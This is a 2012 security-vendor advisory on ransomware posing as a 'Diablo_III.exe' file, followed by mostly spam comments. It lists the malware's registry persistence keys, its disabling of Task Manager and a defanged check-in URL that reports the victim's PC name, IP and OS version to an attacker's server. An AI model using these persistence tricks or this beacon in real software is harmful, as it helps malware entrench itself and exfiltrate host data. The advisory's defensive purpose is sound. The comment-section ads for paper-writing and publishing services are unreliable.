12345

6/11/2012

[Caution] Ransomware-typed malicious file disguised as a Diablo 3

1. Introduction

INCA Internet response team detected malicious Ransom-ware disguised as Diablo 3 related file. Ransomware comprises a class of malware which restricts access to the computer system that it infects, and demands a ransom paid to the creator of the malware in order for the restriction to be removed. Ransomware typically propagates as a conventional computer worm, entering a system through, for example, a vulnerability in a network service or a downloaded file. The program will then run a payload which will begin to encrypt personal files on the hard drive.



Ransomware :

Ransomware (also referred to in some cases as cryptoviruses, cryptotrojans or cryptoworms) comprises a class of malware which restricts access to the computer system that it infects, and demands a ransom paid to the creator of the malware in order for the restriction to be removed.

2. Malicious file info

Diablo III is a dark fantasy/horror-themed action game by Blizzard Entertainment. Before its release, the game broke several presale records and became the most pre-ordered PC game of all time on Amazon.com. With popularity of this game, malicious attackers are using this game for spreading malicious files.


The name of this malicious file is "Diablo_III.exe" same as real Diablo's file. It copies itself in Application Data folder.


Upon executed malicious file, it changes registry to be executed on reboot and blocks to open Windows Task Manager. It changes OS background image and disturbs normal use.

HKLM\Software\Microsoft\Active Setup\Installed Components\{Gusfa7ep-lUCJ-Ed2r-Yvs8-fYwL6tnW7CxX}\9txXqR9p2lPiFxH: %Appdata%\Diablo_III.exe /ActiveX
 HKLM\Software\Microsoft\Windows\CurrentVersion\Run\9txXqR9p2lPiFxH: %Appdata%\Diablo_III.exe
 HKCU\Software\Microsoft\Windows\CurrentVersion\Run\9txXqR9p2lPiFxH: %Appdata%\Diablo_III.exe
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: %Appdata%\Diablo_III.exe
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: %Appdata%\Diablo_III.exe,%WinDir%\System32\userinit.exe,
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: %Appdata%\Diablo_III.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: %Appdata%\Diablo_III.exe,%WinDir%\System32\userinit.exe,
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
 DisableTaskMgr = "1"

Furthermore, it can change PC's name and OS version name.

hxxp://galbbza.com/partner2/universalpanel/gate.php?hwid=4281525696&pc=COMPUTERNAME&localip=192.168.0.1&winver=Windows XP Professional x32

Following figure is a case of disguised as GVU or official web site of Gesellschaft zur Verfolgung von Urheberrechtsverletzungen( German association that investigates cases of software, music, and motion picture copyright infringement)

http://www.gvu.de/index.php?id=39



Due to malicious file, following run screen will be shown. All input devices will be blocked except field for input code. To get code, victims need to pay 50EURO.


Various types of ransomware have been spread. The most popular technique is disguising as sent from a police or public institutions. It says that victim's PC was infected malicious behaviors and did illegal behaviors. User must need to pay in 24 hours, otherwise it will format all data in HDD.

Following figure is a page for ransomware.


3. Summary

These malicious files have been spread via hacked overseas web site and use MS OS/Office, Adobe Flash Player/Reader, and JAVA exploit. To use PC safely from security threats of these malicious attachments, we recommend you download latest security updates and obey following "Security management tips" for general users.

Security management tips

1. Maintain the latest security update on OS and applications
2. Use anti-virus SW from believable security company and keep updating the latest engine and using real time detecting function "ON"
3. Do not see and download attached file from suspicious e-mail.
4. Keep caution to link from instant messenger and SNS.

INCA Internet (Security Response Center / Emergency Response Team) runs responding system against various security threats.

12 comments:

  1. If you want to protect yourself from the malicious software, please, spend some of your time reading this entry, guys.

    ReplyDelete
  2. Thank you for your great job. This is the info I have been looking for!AndroVid live nettv CShare

    ReplyDelete
  3. To play the amazing game run 3, player have to run and jump to pass different levels of obstacles. People remember this game as a game everyone play at school. Good luck and have fun guys!

    ReplyDelete
  4. This comment has been removed by the author.

    ReplyDelete
  5. The post is absolutely fantastic. Lots of great information. This is a great post & very useful, are you interest to Hadees Shareef

    ReplyDelete
  6. Wales publishers are offering optimized, Best Publication Services in UK to boost the researcher and research communities, by providing accelerated and efficient services to fasten the publishing process and to give more opportunities for research on different disciplines.Wales publication research conferences give the researchers an international platform to discuss their scientific research Open Access Publishing UK work and their edges.We are different from other conferences because the community's member organizes our conferences.

    ReplyDelete
  7. One always needs to be careful while on the internet. Anything popular gets misused. Be it a popular game or a website you can Order Dissertation from. When a scammer senses that you will be so desperate to get your hands on something that you may ignore the security red flags, he will use it to his advantage. Stay cautious and browse safely!

    ReplyDelete
  8. Our team works 24/7 to provide quality assistance in front of your queries like, “Can I pay someone to write my paper for me?” in a convenient manner. This is why your paper will never be delayed from our side. Also, we believe in producing high-quality content for all of our clients. So do not wait any further, and get in touch with us to sort out all your academic needs.

    ReplyDelete